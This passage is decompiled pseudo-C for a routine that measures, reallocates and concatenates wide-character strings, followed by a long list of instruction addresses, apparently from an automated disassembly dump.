				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t337;
				signed int _t344;
				signed int _t351;
				unsigned int _t354;
				signed int _t361;
				signed int _t363;
				signed int _t366;
				signed int _t367;
				signed int _t369;
				signed int _t370;
				void* _t372;

				_t247 = __ecx;
				_t372 = (_t370 & 0xfffffff0) - 0x14;
				_t354 = _a8;
				if(_t354 == 0 || ( *_t354 & 0x0000ffff) == 0) {
					_t269 = _a4;
					 *_t269 = 0;
					_t327 =  *_t247;
					 *((intOrPtr*)(_t269 + 4)) = 0;
					if(_t327 == 0) {
						L37:
						_push(0x80);
						_t230 = E003B1030();
						_t372 = _t372 + 4;
						_t142 =  *_a4;
						__eflags = _t142;
						if(_t142 == 0) {
							__eflags = 0;
							 *_t230 = 0;
						} else {
							__eflags = _t230;
							if(_t230 != 0) {
								_t270 =  *_t142 & 0x0000ffff;
								 *_t230 = _t270;
								__eflags = _t270;
								if(_t270 != 0) {
									_t271 = 0;
									__eflags = 0;
									while(1) {
										_t271 = _t271 + 1;
										_t248 =  *(_t142 + _t271 * 4 - 2) & 0x0000ffff;
										 *(_t230 + _t271 * 4 - 2) = _t248;
										__eflags = _t248;
										if(_t248 == 0) {
											goto L43;
										}
										_t249 =  *(_t142 + _t271 * 4) & 0x0000ffff;
										 *(_t230 + _t271 * 4) = _t249;
										__eflags = _t249;
										if(_t249 != 0) {
											continue;
										}
										goto L43;
									}
								}
							}
							L43:
							_push(2);
							_push(_t142);
							E003B10B0();
							_t372 = _t372 + 8;
						}
						_t144 = _a4;
						_t144[1] = 0x40;
						 *_t144 = _t230;
					} else {
						_t147 =  *_t327 & 0x0000ffff;
						if(_t147 == 0) {
							goto L37;
						} else {
							_t273 = _t327 & 0x0000000f;
							if(_t273 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t361 =  ~( ~_t273 + 0x00000007 & 0x00000007) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t147 != 0) {
										break;
									}
									_t273 = _t273 + 8;
									if(_t273 < _t361) {
										continue;
									} else {
										if(_t361 >= 0x7fffffff) {
											goto L15;
										} else {
											goto L13;
										}
									}
									goto L16;
								}
								asm("bsf esi, eax");
								_t361 = (_t361 >> 1) + _t273;
							} else {
								_t361 = 0;
								if((_t273 & 0x00000001) != 0) {
									L13:
									while(( *(_t327 + _t361 * 2) & 0x0000ffff) != 0) {
										_t361 = _t361 + 1;
										if(_t361 < 0x7fffffff) {
											continue;
										} else {
											L15:
											_t361 = 0x7fffffff;
										}
										goto L16;
									}
								} else {
									_t273 =  ~_t273 + 0x10 >> 1;
									while(1) {
										_t147 =  *(_t327 + _t361 * 2) & 0x0000ffff;
										if(_t147 == 0) {
											goto L16;
										}
										_t361 = _t361 + 1;
										if(_t361 < _t273) {
											continue;
										} else {
											goto L9;
										}
										goto L16;
									}
								}
							}
							L16:
							_t10 = _t361 + 1; // 0x80000000
							_t275 =  <=  ? 0x40 : _t10;
							if(_t275 > 0) {
								_t153 = (_t275 >> 5 >> 0x1a) + _t275 >> 6;
								_t276 = _t275 & 0x8000003f;
								__eflags = _t276;
								if(_t276 < 0) {
									_t276 = (_t276 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t276;
								}
								__eflags = _t276;
								_t154 = _t153 + (0 | _t276 > 0x00000000);
								_push(_t154 << 7);
								_t233 = _t154 << 6;
								_t279 = E003B1030();
								_t372 = _t372 + 4;
								_t250 =  *_a4;
								__eflags = _t250;
								if(_t250 == 0) {
									__eflags = 0;
									 *_t279 = 0;
								} else {
									__eflags = _t279;
									if(_t279 != 0) {
										_t163 =  *_t250 & 0x0000ffff;
										 *_t279 = _t163;
										__eflags = _t163;
										if(_t163 != 0) {
											_v36 = _t327;
											_t164 = 0;
											__eflags = 0;
											while(1) {
												_t164 = _t164 + 1;
												_t329 =  *(_t250 + _t164 * 4 - 2) & 0x0000ffff;
												 *(_t279 + _t164 * 4 - 2) = _t329;
												__eflags = _t329;
												if(_t329 == 0) {
													break;
												}
												_t330 =  *(_t250 + _t164 * 4) & 0x0000ffff;
												 *(_t279 + _t164 * 4) = _t330;
												__eflags = _t330;
												if(_t330 != 0) {
													continue;
												}
												break;
											}
											_t327 = _v36;
										}
									}
									_push(2);
									_push(_t250);
									_v36 = _t279;
									E003B10B0();
									_t279 = _v36;
									_t372 = _t372 + 8;
								}
								_t159 = _a4;
								_t159[1] = _t233;
								 *_t159 = _t279;
							} else {
								_t279 = 0;
							}
							if(_t279 != 0) {
								_t160 = 0;
								while(1) {
									_t251 =  *_t327 & 0x0000ffff;
									_t160 = _t160 + 1;
									 *_t279 = _t251;
									if(_t361 != 0 && _t160 == _t361) {
										break;
									}
									if(_t251 != 0) {
										_t279 = _t279 + 2;
										_t327 = _t327 + 2;
										continue;
									}
									goto L46;
								}
								 *(_t279 + 2) = 0;
							}
						}
					}
					L46:
					return _a4;
				} else {
					_t252 =  *__ecx;
					__eflags = _t252;
					if(_t252 == 0) {
						L71:
						_push(0x80);
						_t234 = E003B1030();
						_t372 = _t372 + 4;
						__eflags = 0;
						_t284 = 0x40;
						 *_t234 = 0;
						_t169 =  *_t354 & 0x0000ffff;
						goto L72;
					} else {
						_t220 =  *_t252 & 0x0000ffff;
						__eflags = _t220;
						if(_t220 == 0) {
							goto L71;
						} else {
							_t316 = _t252 & 0x0000000f;
							__eflags = _t316;
							if(_t316 == 0) {
								L54:
								asm("pxor xmm0, xmm0");
								_t351 =  ~( ~_t316 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t351;
								while(1) {
									asm("movdqu xmm1, [ecx+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									__eflags = _t220;
									if(_t220 != 0) {
										break;
									}
									_t316 = _t316 + 8;
									__eflags = _t316 - _t351;
									if(_t316 < _t351) {
										continue;
									} else {
										__eflags = _t351 - 0x7fffffff;
										if(_t351 >= 0x7fffffff) {
											goto L60;
										} else {
											goto L58;
										}
									}
									goto L61;
								}
								asm("bsf edi, eax");
								_t351 = (_t351 >> 1) + _t316;
							} else {
								_t351 = 0;
								__eflags = _t316 & 0x00000001;
								if((_t316 & 0x00000001) != 0) {
									while(1) {
										L58:
										__eflags =  *(_t252 + _t351 * 2) & 0x0000ffff;
										if(( *(_t252 + _t351 * 2) & 0x0000ffff) == 0) {
											goto L61;
										}
										_t351 = _t351 + 1;
										__eflags = _t351 - 0x7fffffff;
										if(_t351 < 0x7fffffff) {
											continue;
										} else {
											L60:
											_t351 = 0x7fffffff;
										}
										goto L61;
									}
								} else {
									_t316 =  ~_t316 + 0x10 >> 1;
									__eflags = _t316;
									while(1) {
										_t220 =  *(_t252 + _t351 * 2) & 0x0000ffff;
										__eflags = _t220;
										if(_t220 == 0) {
											goto L61;
										}
										_t351 = _t351 + 1;
										__eflags = _t351 - _t316;
										if(_t351 < _t316) {
											continue;
										} else {
											goto L54;
										}
										goto L61;
									}
								}
							}
							L61:
							_t48 = _t351 + 1; // 0x80000000
							_t317 = _t48;
							__eflags = _t317 - 0x40;
							_t318 =  <=  ? 0x40 : _t317;
							__eflags = _t318;
							if(_t318 > 0) {
								_t242 = (_t318 >> 5 >> 0x1a) + _t318 >> 6;
								_t319 = _t318 & 0x8000003f;
								__eflags = _t319;
								if(_t319 < 0) {
									_t319 = (_t319 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t319;
								}
								__eflags = _t319;
								_t243 = _t242 + (0 | _t319 > 0x00000000);
								_push(_t243 << 7);
								_v36 = _t252;
								_v32 = _t243 << 6;
								_t224 = E003B1030();
								_t284 = _v32;
								_t252 = _v36;
								_v28 = _t224;
								_t372 = _t372 + 4;
								_t245 = _t224;
								_v32 = _t245;
								 *_t245 = 0;
								_v36 = _t354;
								_t246 = 0;
								_t369 = _v28;
								while(1) {
									_t226 =  *_t252 & 0x0000ffff;
									_t246 = _t246 + 1;
									 *_t369 = _t226;
									__eflags = _t351;
									if(_t351 == 0) {
										goto L69;
									}
									__eflags = _t246 - _t351;
									if(_t246 == _t351) {
										_v28 = _t369;
										_t252 = _t369;
										_t354 = _v36;
										_t234 = _v32;
										 *(_t252 + 2) = 0;
										_t169 =  *_t354 & 0x0000ffff;
									} else {
										goto L69;
									}
									L72:
									__eflags = _t169;
									if(_t169 != 0) {
										goto L73;
									}
									goto L129;
									L69:
									__eflags = _t226;
									if(_t226 == 0) {
										_t354 = _v36;
										_t234 = _v32;
										_t169 =  *_t354 & 0x0000ffff;
									} else {
										_t369 = _t369 + 2;
										_t252 = _t252 + 2;
										__eflags = _t252;
										continue;
									}
									goto L72;
								}
							} else {
								_t234 = 0;
								_t284 = 0;
								L73:
								__eflags = _t354 - _t234;
								if(_t354 != _t234) {
									_t192 = _t354 & 0x0000000f;
									__eflags = _t192;
									if(_t192 == 0) {
										L79:
										asm("pxor xmm0, xmm0");
										_t344 =  ~( ~_t192 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t344;
										while(1) {
											asm("movdqu xmm1, [esi+eax*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb ecx, xmm1");
											__eflags = _t252;
											if(_t252 != 0) {
												break;
											}
											_t192 = _t192 + 8;
											__eflags = _t192 - _t344;
											if(_t192 < _t344) {
												continue;
											} else {
												__eflags = _t344 - 0x7fffffff;
												if(_t344 >= 0x7fffffff) {
													goto L85;
												} else {
													goto L83;
												}
											}
											goto L86;
										}
										asm("bsf edi, ecx");
										_t344 = (_t344 >> 1) + _t192;
									} else {
										_t344 = 0;
										__eflags = _t192 & 0x00000001;
										if((_t192 & 0x00000001) != 0) {
											while(1) {
												L83:
												__eflags =  *(_t354 + _t344 * 2) & 0x0000ffff;
												if(( *(_t354 + _t344 * 2) & 0x0000ffff) == 0) {
													goto L86;
												}
												_t344 = _t344 + 1;
												__eflags = _t344 - 0x7fffffff;
												if(_t344 < 0x7fffffff) {
													continue;
												} else {
													L85:
													_t344 = 0x7fffffff;
												}
												goto L86;
											}
										} else {
											_t192 =  ~_t192 + 0x10 >> 1;
											__eflags = _t192;
											while(1) {
												_t252 =  *(_t354 + _t344 * 2) & 0x0000ffff;
												__eflags = _t252;
												if(_t252 == 0) {
													goto L86;
												}
												_t344 = _t344 + 1;
												__eflags = _t344 - _t192;
												if(_t344 < _t192) {
													continue;
												} else {
													goto L79;
												}
												goto L86;
											}
										}
									}
									L86:
									__eflags = _t234;
									if(_t234 == 0) {
										_t193 = 0;
									} else {
										_t265 = _t234 & 0x0000000f;
										__eflags = _t265;
										if(_t265 == 0) {
											L93:
											asm("pxor xmm0, xmm0");
											_v36 = _t354;
											_t193 =  ~( ~_t265 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t193;
											while(1) {
												asm("movdqu xmm1, [ebx+ecx*2]");
												asm("pcmpeqw xmm1, xmm0");
												asm("pmovmskb esi, xmm1");
												__eflags = _t354;
												if(_t354 != 0) {
													break;
												}
												_t265 = _t265 + 8;
												__eflags = _t265 - _t193;
												if(_t265 < _t193) {
													continue;
												} else {
													_t354 = _v36;
													__eflags = _t193 - 0x7fffffff;
													if(_t193 >= 0x7fffffff) {
														goto L99;
													} else {
														goto L97;
													}
												}
												goto L100;
											}
											asm("bsf eax, eax");
											_t216 = _t354 >> 1;
											_t354 = _v36;
											_t193 = _t216 + _t265;
										} else {
											_t193 = 0;
											__eflags = _t265 & 0x00000001;
											if((_t265 & 0x00000001) != 0) {
												while(1) {
													L97:
													__eflags =  *(_t234 + _t193 * 2) & 0x0000ffff;
													if(( *(_t234 + _t193 * 2) & 0x0000ffff) == 0) {
														goto L100;
													}
													_t193 = _t193 + 1;
													__eflags = _t193 - 0x7fffffff;
													if(_t193 < 0x7fffffff) {
														continue;
													} else {
														L99:
														_t193 = 0x7fffffff;
													}
													goto L100;
												}
											} else {
												_t265 =  ~_t265 + 0x10 >> 1;
												__eflags = _t265;
												_v36 = _t354;
												while(1) {
													__eflags =  *(_t234 + _t193 * 2) & 0x0000ffff;
													if(( *(_t234 + _t193 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t193 = _t193 + 1;
													__eflags = _t193 - _t265;
													if(_t193 < _t265) {
														continue;
													} else {
														_t354 = _v36;
														goto L93;
													}
													goto L100;
												}
												_t354 = _v36;
											}
										}
									}
									L100:
									_t71 = _t193 + 1; // 0x80000000
									_t194 = _t344 + _t71;
									__eflags = _t194;
									if(_t194 != 0) {
										__eflags = _t194 - 0x40;
										_t195 =  <=  ? 0x40 : _t194;
										__eflags = _t284 - _t195;
										if(_t284 < _t195) {
											goto L105;
										}
										goto L116;
									} else {
										__eflags = _t234;
										if(_t234 == 0) {
											__eflags = _t284 - 0x40;
											if(_t284 >= 0x40) {
												goto L129;
											} else {
												goto L182;
											}
											goto L188;
										} else {
											_t196 = 0;
											 *_t234 = 0;
											__eflags = _t284 - 0x40;
											if(_t284 < 0x40) {
												L182:
												_t195 = 0x40;
												L105:
												_t311 = (_t195 >> 5 >> 0x1a) + _t195 >> 6;
												_t200 = _t195 & 0x8000003f;
												__eflags = _t200;
												if(_t200 < 0) {
													_t200 = (_t200 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t200;
												}
												__eflags = _t200;
												_push(_t311 + (0 | _t200 > 0x00000000) << 7);
												_t314 = E003B1030();
												_t372 = _t372 + 4;
												__eflags = _t234;
												if(_t234 == 0) {
													__eflags = 0;
													 *_t314 = 0;
												} else {
													__eflags = _t314;
													if(_t314 != 0) {
														_t206 =  *_t234 & 0x0000ffff;
														 *_t314 = _t206;
														__eflags = _t206;
														if(_t206 != 0) {
															_t207 = 0;
															__eflags = 0;
															while(1) {
																_t207 = _t207 + 1;
																_t262 =  *(_t234 + _t207 * 4 - 2) & 0x0000ffff;
																 *(_t314 + _t207 * 4 - 2) = _t262;
																__eflags = _t262;
																if(_t262 == 0) {
																	goto L113;
																}
																_t263 =  *(_t234 + _t207 * 4) & 0x0000ffff;
																 *(_t314 + _t207 * 4) = _t263;
																__eflags = _t263;
																if(_t263 != 0) {
																	continue;
																}
																goto L113;
															}
														}
													}
													L113:
													_push(2);
													_push(_t234);
													_v36 = _t314;
													E003B10B0();
													_t314 = _v36;
													_t372 = _t372 + 8;
												}
												_t234 = _t314;
												L116:
												_t306 = _t234;
												__eflags = _t234;
												if(_t234 != 0) {
													_t196 =  *_t234 & 0x0000ffff;
													goto L118;
												}
											} else {
												_t306 = _t234;
												L118:
												__eflags = _t196;
												if(_t196 != 0) {
													_t199 = 0;
													__eflags = 0;
													while(1) {
														_t199 = _t199 + 1;
														_t88 = _t234 + _t199 * 4 - 2; // 0x3e
														_t306 = _t88;
														__eflags =  *_t306 & 0x0000ffff;
														if(( *_t306 & 0x0000ffff) == 0) {
															goto L122;
														}
														_t306 = _t234 + _t199 * 4;
														__eflags =  *_t306 & 0x0000ffff;
														if(( *_t306 & 0x0000ffff) != 0) {
															continue;
														}
														goto L122;
													}
												}
												L122:
												__eflags = _t344;
												if(__eflags != 0) {
													if(__eflags > 0) {
														goto L125;
													}
												} else {
													_t344 = 0x7fffffff;
													L125:
													_t198 = 0;
													__eflags = 0;
													while(1) {
														_t258 =  *_t354 & 0x0000ffff;
														__eflags = _t258;
														if(_t258 == 0) {
															goto L128;
														}
														_t198 = _t198 + 1;
														_t354 = _t354 + 2;
														 *_t306 = _t258;
														_t306 = _t306 + 2;
														__eflags = _t198 - _t344;
														if(_t198 < _t344) {
															continue;
														}
														goto L128;
													}
												}
												L128:
												__eflags = 0;
												 *_t306 = 0;
											}
										}
									}
								}
							}
						}
					}
					L129:
					_t285 = _a4;
					 *_t285 = 0;
					 *((intOrPtr*)(_t285 + 4)) = 0;
					__eflags = _t234;
					if(_t234 == 0) {
						L165:
						_push(0x80);
						_t363 = E003B1030();
						_t372 = _t372 + 4;
						_t173 =  *_a4;
						__eflags = _t173;
						if(_t173 == 0) {
							__eflags = 0;
							 *_t363 = 0;
						} else {
							__eflags = _t363;
							if(_t363 != 0) {
								_t286 =  *_t173 & 0x0000ffff;
								 *_t363 = _t286;
								__eflags = _t286;
								if(_t286 != 0) {
									_t287 = 0;
									__eflags = 0;
									while(1) {
										_t287 = _t287 + 1;
										_t253 =  *(_t173 + _t287 * 4 - 2) & 0x0000ffff;
										 *(_t363 + _t287 * 4 - 2) = _t253;
										__eflags = _t253;
										if(_t253 == 0) {
											goto L171;
										}
										_t254 =  *(_t173 + _t287 * 4) & 0x0000ffff;
										 *(_t363 + _t287 * 4) = _t254;
										__eflags = _t254;
										if(_t254 != 0) {
											continue;
										}
										goto L171;
									}
								}
							}
							L171:
							_push(2);
							_push(_t173);
							E003B10B0();
							_t372 = _t372 + 8;
						}
						_t175 = _a4;
						 *_t175 = _t363;
						_t175[1] = 0x40;
					} else {
						_t179 =  *_t234 & 0x0000ffff;
						__eflags = _t179;
						if(_t179 == 0) {
							goto L165;
						} else {
							_t289 = _t234 & 0x0000000f;
							__eflags = _t289;
							if(_t289 == 0) {
								L136:
								asm("pxor xmm0, xmm0");
								_t337 =  ~( ~_t289 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t337;
								while(1) {
									asm("movdqu xmm1, [ebx+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									__eflags = _t179;
									if(_t179 != 0) {
										break;
									}
									_t289 = _t289 + 8;
									__eflags = _t289 - _t337;
									if(_t289 < _t337) {
										continue;
									} else {
										__eflags = _t337 - 0x7fffffff;
										if(_t337 >= 0x7fffffff) {
											goto L142;
										} else {
											goto L140;
										}
									}
									goto L143;
								}
								asm("bsf edi, eax");
								_t337 = (_t337 >> 1) + _t289;
							} else {
								_t337 = 0;
								__eflags = _t289 & 0x00000001;
								if((_t289 & 0x00000001) != 0) {
									while(1) {
										L140:
										__eflags =  *(_t234 + _t337 * 2) & 0x0000ffff;
										if(( *(_t234 + _t337 * 2) & 0x0000ffff) == 0) {
											goto L143;
										}
										_t337 = _t337 + 1;
										__eflags = _t337 - 0x7fffffff;
										if(_t337 < 0x7fffffff) {
											continue;
										} else {
											L142:
											_t337 = 0x7fffffff;
										}
										goto L143;
									}
								} else {
									_t289 =  ~_t289 + 0x10 >> 1;
									__eflags = _t289;
									while(1) {
										_t179 =  *(_t234 + _t337 * 2) & 0x0000ffff;
										__eflags = _t179;
										if(_t179 == 0) {
											goto L143;
										}
										_t337 = _t337 + 1;
										__eflags = _t337 - _t289;
										if(_t337 < _t289) {
											continue;
										} else {
											goto L136;
										}
										goto L143;
									}
								}
							}
							L143:
							_t99 = _t337 + 1; // 0x80000000
							_t290 = _t99;
							__eflags = _t290 - 0x40;
							_t291 =  <=  ? 0x40 : _t290;
							__eflags = _t291;
							if(_t291 > 0) {
								_t185 = (_t291 >> 5 >> 0x1a) + _t291 >> 6;
								_t292 = _t291 & 0x8000003f;
								__eflags = _t292;
								if(_t292 < 0) {
									_t292 = (_t292 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t292;
								}
								__eflags = _t292;
								_t186 = _t185 + (0 | _t292 > 0x00000000);
								_push(_t186 << 7);
								_t366 = _t186 << 6;
								_t188 = E003B1030();
								_t372 = _t372 + 4;
								_t255 =  *_a4;
								__eflags = _t255;
								if(_t255 == 0) {
									__eflags = 0;
									 *_t188 = 0;
								} else {
									__eflags = _t188;
									if(_t188 != 0) {
										_t300 =  *_t255 & 0x0000ffff;
										 *_t188 = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											_v32 = _t234;
											_t301 = 0;
											__eflags = 0;
											while(1) {
												_t301 = _t301 + 1;
												_t236 =  *(_t255 + _t301 * 4 - 2) & 0x0000ffff;
												 *(_t188 + _t301 * 4 - 2) = _t236;
												__eflags = _t236;
												if(_t236 == 0) {
													break;
												}
												_t237 =  *(_t255 + _t301 * 4) & 0x0000ffff;
												 *(_t188 + _t301 * 4) = _t237;
												__eflags = _t237;
												if(_t237 != 0) {
													continue;
												}
												break;
											}
											_t234 = _v32;
										}
									}
									_push(2);
									_push(_t255);
									_v36 = _t188;
									E003B10B0();
									_t188 = _v36;
									_t372 = _t372 + 8;
								}
								_t297 = _a4;
								_t297[1] = _t366;
								 *_t297 = _t188;
							} else {
								_t188 = 0;
							}
							_t298 = _t234;
							__eflags = _t188;
							if(_t188 != 0) {
								__eflags = _t234;
								if(_t234 != 0) {
									_t256 = 0;
									while(1) {
										_t367 =  *_t298 & 0x0000ffff;
										_t256 = _t256 + 1;
										 *_t188 = _t367;
										__eflags = _t337;
										if(_t337 == 0) {
											goto L163;
										}
										__eflags = _t256 - _t337;
										if(_t256 == _t337) {
											 *(_t188 + 2) = 0;
										} else {
											goto L163;
										}
										goto L174;
										L163:
										__eflags = _t367;
										if(_t367 != 0) {
											_t188 = _t188 + 2;
											_t298 = _t298 + 2;
											__eflags = _t298;
											continue;
										}
										goto L174;
									}
								}
							}
						}
					}
					L174:
					_push(2);
					_push(_t234);
					E003B10B0();
					return _a4;
				}
				L188:
			}

0x003b8ef0
0x003b8ef9
0x003b8efc
0x003b8f01
0x003b8f0e
0x003b8f13
0x003b8f15
0x003b8f17
0x003b8f1c
0x003b907a
0x003b907a
0x003b9084
0x003b9086
0x003b908c
0x003b908e
0x003b9090
0x003b90ca
0x003b90cc
0x003b9092
0x003b9092
0x003b9094
0x003b9096
0x003b9099
0x003b909c
0x003b909e
0x003b90a0
0x003b90a0
0x003b90a2
0x003b90a2
0x003b90a3
0x003b90a8
0x003b90ad
0x003b90af
0x00000000
0x00000000
0x003b90b1
0x003b90b5
0x003b90b9
0x003b90bb
0x00000000
0x00000000
0x00000000
0x003b90bb
0x003b90a2
0x003b909e
0x003b90bd
0x003b90bd
0x003b90bf
0x003b90c0
0x003b90c5
0x003b90c5
0x003b90cf
0x003b90d2
0x003b90d9
0x003b8f22
0x003b8f22
0x003b8f27
0x00000000
0x003b8f2d
0x003b8f2f
0x003b8f32
0x003b8f4f
0x003b8f53
0x003b8f5f
0x003b8f65
0x003b8f65
0x003b8f6a
0x003b8f6e
0x003b8f74
0x00000000
0x00000000
0x003b8f7a
0x003b8f7f
0x00000000
0x003b8f81
0x003b8f87
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8f87
0x00000000
0x003b8f7f
0x003b9632
0x003b9637
0x003b8f34
0x003b8f34
0x003b8f39
0x00000000
0x003b8f89
0x003b8f91
0x003b8f98
0x00000000
0x003b8f9a
0x003b8f9a
0x003b8f9a
0x003b8f9a
0x00000000
0x003b8f98
0x003b8f3b
0x003b8f40
0x003b8f42
0x003b8f42
0x003b8f48
0x00000000
0x00000000
0x003b8f4a
0x003b8f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8f4d
0x003b8f42
0x003b8f39
0x003b8f9f
0x003b8fa4
0x003b8faa
0x003b8faf
0x003b8fc2
0x003b8fc5
0x003b8fc5
0x003b8fcb
0x003b8fd3
0x003b8fd3
0x003b8fd3
0x003b8fd4
0x003b8fde
0x003b8fe5
0x003b8fe6
0x003b8fee
0x003b8ff0
0x003b8ff6
0x003b8ff8
0x003b8ffa
0x003b9042
0x003b9044
0x003b8ffc
0x003b8ffc
0x003b8ffe
0x003b9000
0x003b9003
0x003b9006
0x003b9008
0x003b900a
0x003b900d
0x003b900d
0x003b900f
0x003b900f
0x003b9010
0x003b9015
0x003b901a
0x003b901c
0x00000000
0x00000000
0x003b901e
0x003b9022
0x003b9026
0x003b9028
0x00000000
0x00000000
0x00000000
0x003b9028
0x003b902a
0x003b902a
0x003b9008
0x003b902d
0x003b902f
0x003b9030
0x003b9034
0x003b9039
0x003b903d
0x003b903d
0x003b9047
0x003b904a
0x003b904d
0x003b8fb1
0x003b8fb1
0x003b8fb1
0x003b9051
0x003b9057
0x003b9061
0x003b9061
0x003b9064
0x003b9065
0x003b906a
0x00000000
0x00000000
0x003b9076
0x003b905b
0x003b905e
0x00000000
0x003b905e
0x00000000
0x003b9076
0x003b9629
0x003b9629
0x003b9051
0x003b8f27
0x003b90db
0x003b90e7
0x003b90ea
0x003b90ea
0x003b90ec
0x003b90ee
0x003b920f
0x003b920f
0x003b9219
0x003b921b
0x003b921e
0x003b9220
0x003b9225
0x003b9228
0x00000000
0x003b90f4
0x003b90f4
0x003b90f7
0x003b90f9
0x00000000
0x003b90ff
0x003b9101
0x003b9101
0x003b9104
0x003b9121
0x003b9125
0x003b9131
0x003b9131
0x003b9137
0x003b9137
0x003b913c
0x003b9140
0x003b9144
0x003b9146
0x00000000
0x00000000
0x003b914c
0x003b914f
0x003b9151
0x00000000
0x003b9153
0x003b9153
0x003b9159
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9159
0x00000000
0x003b9151
0x003b9668
0x003b966d
0x003b9106
0x003b9106
0x003b9108
0x003b910b
0x003b915b
0x003b915b
0x003b915f
0x003b9161
0x00000000
0x00000000
0x003b9163
0x003b9164
0x003b916a
0x00000000
0x003b916c
0x003b916c
0x003b916c
0x003b916c
0x00000000
0x003b916a
0x003b910d
0x003b9112
0x003b9112
0x003b9114
0x003b9114
0x003b9118
0x003b911a
0x00000000
0x00000000
0x003b911c
0x003b911d
0x003b911f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b911f
0x003b9114
0x003b910b
0x003b9171
0x003b9176
0x003b9176
0x003b9179
0x003b917c
0x003b917f
0x003b9181
0x003b9196
0x003b9199
0x003b9199
0x003b919f
0x003b91a7
0x003b91a7
0x003b91a7
0x003b91aa
0x003b91af
0x003b91b9
0x003b91ba
0x003b91be
0x003b91c2
0x003b91c7
0x003b91cb
0x003b91cf
0x003b91d3
0x003b91d6
0x003b91da
0x003b91de
0x003b91e1
0x003b91e4
0x003b91e6
0x003b91f2
0x003b91f2
0x003b91f5
0x003b91f6
0x003b91f9
0x003b91fb
0x00000000
0x00000000
0x003b91fd
0x003b91ff
0x003b963e
0x003b9644
0x003b9646
0x003b9649
0x003b964d
0x003b9651
0x00000000
0x00000000
0x00000000
0x003b922b
0x003b922b
0x003b922d
0x00000000
0x00000000
0x00000000
0x003b9205
0x003b9205
0x003b9207
0x003b9659
0x003b965c
0x003b9660
0x003b920d
0x003b91ec
0x003b91ef
0x003b91ef
0x00000000
0x003b91ef
0x00000000
0x003b9207
0x003b9183
0x003b9183
0x003b9185
0x003b9233
0x003b9233
0x003b9235
0x003b923d
0x003b923d
0x003b9240
0x003b925c
0x003b9260
0x003b926c
0x003b926c
0x003b9272
0x003b9272
0x003b9277
0x003b927b
0x003b927f
0x003b9281
0x00000000
0x00000000
0x003b9287
0x003b928a
0x003b928c
0x00000000
0x003b928e
0x003b928e
0x003b9294
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9294
0x00000000
0x003b928c
0x003b96be
0x003b96c3
0x003b9242
0x003b9242
0x003b9244
0x003b9246
0x003b9296
0x003b9296
0x003b929a
0x003b929c
0x00000000
0x00000000
0x003b929e
0x003b929f
0x003b92a5
0x00000000
0x003b92a7
0x003b92a7
0x003b92a7
0x003b92a7
0x00000000
0x003b92a5
0x003b9248
0x003b924d
0x003b924d
0x003b924f
0x003b924f
0x003b9253
0x003b9255
0x00000000
0x00000000
0x003b9257
0x003b9258
0x003b925a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b925a
0x003b924f
0x003b9246
0x003b92ac
0x003b92ac
0x003b92ae
0x003b96b7
0x003b92b4
0x003b92b6
0x003b92b6
0x003b92b9
0x003b92e0
0x003b92e4
0x003b92f0
0x003b92f3
0x003b92f3
0x003b92f8
0x003b92f8
0x003b92fd
0x003b9301
0x003b9305
0x003b9307
0x00000000
0x00000000
0x003b930d
0x003b9310
0x003b9312
0x00000000
0x003b9314
0x003b9314
0x003b9317
0x003b931c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b931c
0x00000000
0x003b9312
0x003b96a8
0x003b96ab
0x003b96ad
0x003b96b0
0x003b92bb
0x003b92bb
0x003b92bd
0x003b92c0
0x003b931e
0x003b931e
0x003b9322
0x003b9324
0x00000000
0x00000000
0x003b9326
0x003b9327
0x003b932c
0x00000000
0x003b932e
0x003b932e
0x003b932e
0x003b932e
0x00000000
0x003b932c
0x003b92c2
0x003b92c7
0x003b92c7
0x003b92c9
0x003b92cc
0x003b92d0
0x003b92d2
0x00000000
0x00000000
0x003b92d8
0x003b92d9
0x003b92db
0x00000000
0x003b92dd
0x003b92dd
0x00000000
0x003b92dd
0x00000000
0x003b92db
0x003b9674
0x003b9674
0x003b92c0
0x003b92b9
0x003b9333
0x003b9333
0x003b9333
0x003b9337
0x003b9339
0x003b935d
0x003b9360
0x003b9363
0x003b9365
0x00000000
0x00000000
0x00000000
0x003b933b
0x003b933b
0x003b933d
0x003b967c
0x003b967f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9343
0x003b9343
0x003b9345
0x003b9348
0x003b934b
0x003b9685
0x003b9685
0x003b936b
0x003b9375
0x003b9378
0x003b9378
0x003b937d
0x003b9385
0x003b9385
0x003b9385
0x003b9386
0x003b9395
0x003b939b
0x003b939d
0x003b93a0
0x003b93a2
0x003b93e4
0x003b93e6
0x003b93a4
0x003b93a4
0x003b93a6
0x003b93a8
0x003b93ab
0x003b93ae
0x003b93b0
0x003b93b2
0x003b93b2
0x003b93b4
0x003b93b4
0x003b93b5
0x003b93ba
0x003b93bf
0x003b93c1
0x00000000
0x00000000
0x003b93c3
0x003b93c7
0x003b93cb
0x003b93cd
0x00000000
0x00000000
0x00000000
0x003b93cd
0x003b93b4
0x003b93b0
0x003b93cf
0x003b93cf
0x003b93d1
0x003b93d2
0x003b93d6
0x003b93db
0x003b93df
0x003b93df
0x003b93e9
